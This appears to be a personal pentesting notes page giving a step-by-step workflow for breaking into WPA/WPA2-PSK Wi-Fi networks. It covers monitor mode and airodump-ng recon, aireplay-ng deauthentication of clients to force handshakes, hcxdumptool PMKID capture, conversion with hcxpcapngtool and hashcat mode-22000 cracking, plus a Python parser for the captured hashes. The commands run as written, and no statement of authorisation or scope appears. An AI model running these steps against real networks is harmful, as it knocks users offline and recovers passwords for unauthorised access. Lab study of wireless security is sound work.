Wireless
Tools
Aircrack - Main tool for recon and grabbing handshakes
Hcxdumptool - Main tool for obtaining PMKID and EAPOL M1M2M3 or EAPOL M1M2M3M4 auth
Hcxtools - Used to convert .cap, .pcap, and .pcapng files into a hashcat-readable format.
Hashcat - For cracking hashes
Handshake/PMKID
Aircrack
Verify the interface wlan0 is up and ready
iwconfig
Put interface into monitor mode
sudo airmon-ng start wlan0
Start scanning and performing recon, taking note of:
The channel number. This is needed if the target is a single AP on one channel; if there are multiple APs for it on different channels, this is not needed.
The AUTH column. PSK (pre-shared key) means we can obtain a handshake for offline cracking; MGT means it is configured for WPA-Enterprise.
The stations listed below, to see whether any clients are connected to our target. This may not show 100% of the connected clients.
sudo airodump-ng wlan0mon
*For 5GHz networks
sudo airodump-ng wlan1mon -b a
*For all networks (2.5GHz and 5GHz) - Note this can take longer as it sniffs multiple bands.
sudo airodump-ng wlan1mon -b abg
Focus on the target ESSID(s) and save to a file (be sure to add the band with -b if sniffing on 5GHz or both)
sudo airodump-ng wlan0mon -c CH# --essid "SSID" -w outfile
Obtain the handshake: either wait for someone to connect to the AP from their device, or force a deauth. Using a second terminal window/tab, to deauth everything from the network:
sudo aireplay-ng -0 10 -a BSSID wlan0mon
If we choose a specific client to deauth, the command is the same but with the client MAC (station):
sudo aireplay-ng -0 10 -a BSSID -c STATION wlan0mon
We can see whether a handshake was obtained by checking the top right of the airodump screen.
Once we have our handshake, we can stop airodump with ctrl+c.
HCXDumptool
This depends on which version you have installed, e.g. v6.2.9 has a different interface from v6.3.0+. I'll be going with the most up-to-date version (currently v6.3.5).
This attack is not guaranteed! Not all access points (APs) are vulnerable to the PMKID attack, BUT this can still obtain us EAPOL M1M2M3 or EAPOL M1M2M3M4 auths.
Legend
R = + AP display : AP is in TX range or under attack
1 = + AP display : got EAPOL M1 (CHALLENGE)
3 = + AP display : got EAPOL M1M2M3 or EAPOL M1M2M3M4 (AUTHORIZATION) - hashcat / JtR can work on
P = + AP display : got PMKID - hashcat / JtR can work on
S = + AP display : AUTHENTICATION KEY MANAGEMENT PSK
E = + CLIENT display : got EAP-START MESSAGE
2 = + CLIENT display : got EAPOL M1M2 (ROGUE CHALLENGE) - hashcat / JtR can work on
Scan for PMKID
Put interface into monitor mode
sudo airmon-ng start wlan0
Find the BSSID of our target with some recon using airodump
sudo airodump-ng wlan0mon
Once we have the BSSID, put it into a Berkeley Packet Filter (BPF) .bpf file.
tcpdump -s 65535 -y IEEE802_11_RADIO wlan addr3 BSSID -ddd > SSID.bpf
OR
hcxdumptool --bpfc="wlan addr3 BSSID" > SSID.bpf
** NOTE: We can attack multiple APs with:
tcpdump -s 65535 -y IEEE802_11_RADIO wlan addr3 BSSID or wlan addr3 BSSID2 -ddd > SSID.bpf
OR
hcxdumptool --bpfc="wlan addr3 BSSID1 or wlan addr3 BSSID2" > SSID.bpf
sudo hcxdumptool --rds=1 -F --bpf=SSID.bpf -i wlan0mon -w outfile.pcapng
After a while we may see a + under the 3 or P column of our target. Either of these can be used to obtain the password with hashcat. (I was unable to get a PMKID in the demo environment, sadly.)
When we see the + under the 3 or P column of our target, stop hcxdumptool with ctrl+c.
Crack it with hashcat
Convert the file to a hashcat format. The output will look the same regardless of which file extension it is.
.cap file conversion to hashcat format
sudo hcxpcapngtool -o SSIDHash outfile.cap
.pcapng file conversion to hashcat format
sudo hcxpcapngtool -o SSIDHash outfile.pcapng
Use hashcat with mode 22000 and a wordlist. Try different wordlists and rules.
sudo hashcat -m 22000 SSIDHash wordlist
We can also run the above command with --show to display the password.
sudo hashcat -m 22000 SSIDHash wordlist --show
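As an added example (not part of these notes), a small Python inventory of a converted mode-22000 hash file: it parses each line hcxpcapngtool writes, tells PMKID entries from 4-way-handshake entries (the hcxdumptool P and 3 columns) and groups them per ESSID, which is handy for checking what a capture actually contains before spending time on wordlists, or for reporting which networks exposed a PMKID. The field layout and message-pair mapping follow the hashcat 22000 format as I know it; the sample lines are constructed, not from a real capture.

```python
from dataclasses import dataclass
from typing import Optional
# Hashcat mode-22000 line layout, as written by hcxpcapngtool:
#   WPA*TYPE*PMKID_OR_MIC*MAC_AP*MAC_CLIENT*ESSID_HEX*ANONCE*EAPOL*MESSAGEPAIR
# TYPE 01 = PMKID (hcxdumptool "P" column), TYPE 02 = EAPOL handshake ("3" column).
# PMKID lines leave the last three fields empty; the low three bits of MESSAGEPAIR
# say which two EAPOL messages the MIC was taken from.
MESSAGE_PAIRS = {0: "M1M2", 1: "M1M4", 2: "M2M3", 3: "M2M3", 4: "M3M4", 5: "M3M4"}

@dataclass
class Wpa22000:
    kind: str                    # "PMKID" or "EAPOL"
    mac_ap: str                  # aa:bb:cc:dd:ee:ff
    mac_client: str
    essid: str
    message_pair: Optional[str]  # e.g. "M2M3"; None for PMKID lines

def _mac(field: str) -> str:
    if len(field) != 12:
        raise ValueError(f"bad MAC field: {field!r}")
    return ":".join(f"{b:02x}" for b in bytes.fromhex(field))  # ValueError if not hex

def parse_22000_line(line: str) -> Wpa22000:
    fields = line.strip().split("*")
    if len(fields) != 9 or fields[0] != "WPA":
        raise ValueError(f"not a mode-22000 line: {line!r}")
    _, typ, keymat, ap, client, essid_hex, _anonce, _eapol, mp = fields
    if len(bytes.fromhex(keymat)) != 16:  # PMKID and MIC are both 16 bytes
        raise ValueError("PMKID/MIC field must be 32 hex characters")
    essid = bytes.fromhex(essid_hex).decode("utf-8", "replace")
    if typ == "01":
        return Wpa22000("PMKID", _mac(ap), _mac(client), essid, None)
    if typ == "02":
        pair = MESSAGE_PAIRS.get(int(mp, 16) & 0x07, "unknown")
        return Wpa22000("EAPOL", _mac(ap), _mac(client), essid, pair)
    raise ValueError(f"unknown TYPE {typ!r}")

def inventory(text: str) -> dict:
    # Per ESSID: the AP MACs seen and the kinds of key material captured.
    out: dict = {}
    for line in filter(str.strip, text.splitlines()):
        rec = parse_22000_line(line)
        entry = out.setdefault(rec.essid, {"aps": set(), "kinds": set()})
        entry["aps"].add(rec.mac_ap)
        entry["kinds"].add("PMKID" if rec.kind == "PMKID" else f"EAPOL {rec.message_pair}")
    return out

# Constructed sample (not a real capture): a PMKID and an M2M3 handshake for "HomeNet".
SAMPLE = (f"WPA*01*{'a1' * 16}*001122334455*66778899aabb*{'HomeNet'.encode().hex()}***\n"
          f"WPA*02*{'b2' * 16}*001122334455*66778899aabb*{'HomeNet'.encode().hex()}*"
          f"{'c3' * 32}*{'d4' * 8}*02")
```

Run inventory() over the contents of the SSIDHash file produced above to get, per ESSID, the AP MACs seen and whether a PMKID, a full handshake, or only an M1M2 challenge was captured.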
Captive Portals
COMING SOON